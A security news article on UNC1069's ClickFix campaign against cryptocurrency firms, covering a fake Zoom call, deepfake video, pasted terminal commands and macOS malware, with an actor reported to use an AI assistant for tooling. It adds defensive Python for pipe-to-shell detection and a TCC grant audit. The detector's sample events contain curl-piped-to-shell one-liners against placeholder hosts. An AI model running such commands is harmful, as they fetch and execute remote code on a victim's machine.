A financially motivated threat actor tracked as UNC1069 is using a ClickFix-style social engineering campaign to deploy multiple macOS malware families against crypto-focused organizations.
According to new research from Google Cloud’s Mandiant, the activity recently targeted an employee at a company operating in the cryptocurrency and decentralized finance (DeFi) sector. The researchers said that the North Korea-linked UNC1069 used a social engineering chain that involved a hijacked Telegram account, a fake Zoom meeting, a ClickFix-style command execution, and the reported use of AI-generated video to deceive the victim.
By impersonating a known industry contact and staging a fake video meeting, the threat actor convinced the victim to manually execute malicious terminal commands on a macOS system.
ClickFix as initial access
The attack began with the victim being contacted via Telegram from a compromised account belonging to a legitimate industry executive. After establishing credibility, the attacker invited the target to a video meeting hosted on infrastructure controlled by the threat actor.
During the meeting, the victim reportedly saw what appeared to be a recognizable individual from the cryptocurrency industry. Researchers assessed that the video may have been artificially generated or manipulated to reinforce legitimacy. Shortly after the call began, the attacker claimed there were audio issues and instructed the victim to perform troubleshooting steps.
These steps included copying and pasting commands into the macOS Terminal. One command used “curl” piped into “zsh”, effectively downloading and executing a remote script. That action initiated the infection chain.
Mandiant said it observed similar tactics outside of this attack. “The recovered web page provided two sets of commands to be run for ‘troubleshooting’: one for macOS systems, and one for Windows systems,” the researchers noted. “Mandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives.”
UNC1069 is known to use tools like Google Gemini to develop tooling, conduct operational research, and assist during reconnaissance stages, they added.
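The ClickFix step described above leaves a distinctive process-execution shape: an interactive terminal spawning a shell whose command line pipes a downloader straight into another shell. The following Python is an added example written for this article, not code from Mandiant or from the report; it runs a detection over constructed process records (the event shape, the `.invalid` hostnames and the parent paths are all assumptions) and generalizes the page's `curl | zsh` case to `wget` and to `sh`/`bash` sinks.

```python
import re
from typing import Optional

# Constructed sample process-execution records, in the shape a macOS EDR or an
# Endpoint Security client might emit. None of these are real telemetry from the
# Mandiant report; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {
        "id": 1,
        "parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
        "process": "/bin/zsh",
        "cmdline": 'zsh -c "curl -fsSL https://meet-fix.invalid/audio.sh | zsh"',
    },
    {
        "id": 2,
        "parent": "/Applications/iTerm.app/Contents/MacOS/iTerm2",
        "process": "/bin/bash",
        "cmdline": "bash -c 'curl -s http://cdn.invalid/a | sudo bash'",
    },
    {
        "id": 3,
        "parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
        "process": "/usr/bin/curl",
        "cmdline": "curl -O https://example.invalid/report.pdf",
    },
    {
        "id": 4,
        "parent": "/usr/local/bin/ci-agent",
        "process": "/bin/sh",
        "cmdline": "sh -c 'curl -sSf https://deps.invalid/install.sh | sh'",
    },
    {
        "id": 5,
        "parent": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
        "process": "/bin/zsh",
        "cmdline": "zsh -c 'ls -la | grep zsh'",
    },
]

# A downloader followed, within the same pipeline segment, by a pipe into a shell.
# [^|;&]* keeps the match inside one command, so "curl x; ls | zsh" is not a hit.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:zsh|bash|sh)\b",
    re.IGNORECASE,
)

# Parent apps whose child shells represent a human typing or pasting commands.
INTERACTIVE_TERMINALS = ("/Terminal.app/", "/iTerm.app/")


def pipes_download_to_shell(cmdline: str) -> bool:
    """True when the command line pipes curl/wget output into a shell."""
    return PIPE_TO_SHELL.search(cmdline) is not None


def launched_from_terminal(parent_path: str) -> bool:
    """True when the parent process is an interactive terminal application."""
    return any(marker in parent_path for marker in INTERACTIVE_TERMINALS)


def classify(event: dict) -> Optional[str]:
    """Return a severity label, or None when the event is not interesting."""
    if not pipes_download_to_shell(event["cmdline"]):
        return None
    # A pasted one-liner in an interactive terminal is the ClickFix shape; the
    # same pattern under an automation parent is common and lower signal.
    return "high" if launched_from_terminal(event["parent"]) else "low"


def scan(events) -> list:
    """Return [(event id, severity)] for every event that matched."""
    alerts = []
    for ev in events:
        severity = classify(ev)
        if severity:
            alerts.append((ev["id"], severity))
    return alerts


if __name__ == "__main__":
    for event_id, severity in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {severity}")
```

The parent-process check is what separates a user-pasted ClickFix command from the same pattern run by a build agent or package installer, which is why the two cases get different severities rather than being merged into one rule.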
Use of specialized, undocumented macOS malware
After the ClickFix-triggered access was established, UNC1069 deployed a multi-stage macOS malware stack that Mandiant identified as including WAVESHAPER, HYPERCALL, HIDDENCALL, DEEPBREATH, and CHROMEPUSH, among others. Several of these malware families had not been documented publicly before Mandiant’s disclosure.
WAVESHAPER functioned as the primary backdoor, establishing remote access and enabling additional payload delivery. HYPERCALL operated as a downloader, retrieving secondary components such as HIDDENCALL, which provided further command execution capabilities. This staged deployment allowed the threat actor to expand control over the compromised macOS system in phases rather than dropping a single large payload.
DEEPBREATH, a Swift-based infostealer, focused on harvesting sensitive data from the host. According to the researchers, it manipulated Apple’s Transparency, Consent, and Control (TCC) framework to access protected resources without prompting the user. That enabled the collection of browser data, keychain material, and messaging content. CHROMEPUSH, meanwhile, targeted browser environments, including session cookies and authentication tokens.
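A TCC grant that appears without a user prompt still lands in the TCC database, so a periodic audit of who holds sensitive grants is one practical check against the DEEPBREATH-style abuse described above. The Python below is an added example written for this article, not code from Mandiant or from the report. It builds an in-memory table shaped like the `access` table of a TCC database and flags allowed grants on sensitive services that are not on an allowlist, belong to a path-based client, or were modified recently. The column names, value meanings, allowlist and rows are this example's assumptions, to be checked against the macOS version in use.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

# Subset of the columns of the `access` table in a TCC database (the system
# copy under /Library/Application Support/com.apple.TCC/ or the per-user copy
# under ~/Library). Column names and value meanings are this example's
# assumption; verify them against the macOS version you run.
SCHEMA = """
CREATE TABLE access (
    service       TEXT    NOT NULL,
    client        TEXT    NOT NULL,
    client_type   INTEGER NOT NULL,   -- 0 = bundle identifier, 1 = absolute path
    auth_value    INTEGER NOT NULL,   -- 0 = denied, 2 = allowed, 3 = limited
    last_modified INTEGER NOT NULL    -- unix epoch seconds
);
"""

# Grants that let a process read data the user would normally be prompted for.
SENSITIVE_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles",  # Full Disk Access (Messages, Mail, browser data)
    "kTCCServiceAccessibility",
    "kTCCServiceScreenCapture",
}
ALLOWED = 2

# Clients the organisation expects to hold such grants (constructed allowlist).
EXPECTED_CLIENTS = {"com.example.edr-agent", "com.example.backup"}

NOW = datetime(2025, 1, 15, 12, 0, tzinfo=timezone.utc)  # fixed clock for the demo


def build_sample_db() -> sqlite3.Connection:
    """In-memory TCC-shaped table with constructed rows; not data from a real host."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    old = int((NOW - timedelta(days=90)).timestamp())
    recent = int((NOW - timedelta(hours=2)).timestamp())
    conn.executemany(
        "INSERT INTO access VALUES (?, ?, ?, ?, ?)",
        [
            ("kTCCServiceSystemPolicyAllFiles", "com.example.edr-agent", 0, ALLOWED, old),
            ("kTCCServiceSystemPolicyAllFiles", "/Users/alice/Library/.cache/helper", 1, ALLOWED, recent),
            ("kTCCServiceAccessibility", "com.example.meeting", 0, ALLOWED, old),
            ("kTCCServiceCamera", "com.example.meeting", 0, ALLOWED, recent),
            ("kTCCServiceSystemPolicyAllFiles", "com.example.olddev", 0, 0, recent),
        ],
    )
    return conn


def audit_tcc(conn, now=NOW, recent_window=timedelta(hours=24)) -> list:
    """Return one finding per suspicious allowed grant on a sensitive service."""
    findings = []
    rows = conn.execute(
        "SELECT service, client, client_type, auth_value, last_modified "
        "FROM access ORDER BY rowid"
    )
    for service, client, client_type, auth_value, last_modified in rows:
        if service not in SENSITIVE_SERVICES or auth_value != ALLOWED:
            continue
        reasons = []
        if client not in EXPECTED_CLIENTS:
            reasons.append("client not on allowlist")
        if client_type == 1:
            reasons.append("path-based client (no bundle identity)")
        modified = datetime.fromtimestamp(last_modified, tz=timezone.utc)
        if now - modified <= recent_window:
            reasons.append("granted within the last 24h")
        if reasons:
            findings.append({"service": service, "client": client, "reasons": reasons})
    return findings


def run_demo() -> list:
    """Audit the constructed database and return its findings."""
    return audit_tcc(build_sample_db())


if __name__ == "__main__":
    for finding in run_demo():
        print(f"{finding['service']}: {finding['client']} -> {', '.join(finding['reasons'])}")
```

Reading the real database requires Full Disk Access for the auditing process itself, so in practice this runs from a management agent that already holds that grant and ships the findings to the SIEM rather than from an ad hoc script.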
The researchers also observed abuse of macOS security mechanisms, including functionality of Apple’s XProtect system. Rather than disabling protections outright, the malware leveraged trusted system components and expected behaviors to reduce detection visibility.
Mandiant stated that the use of a custom, integrated tool suite indicated UNC1069’s technical proficiency, both in building specialized capabilities and in bypassing security controls. It provided a list of network-based and host-based indicators of compromise (IOCs) to support detection efforts. The disclosure also included a set of YARA rules, which are supported in Google SecOps as well.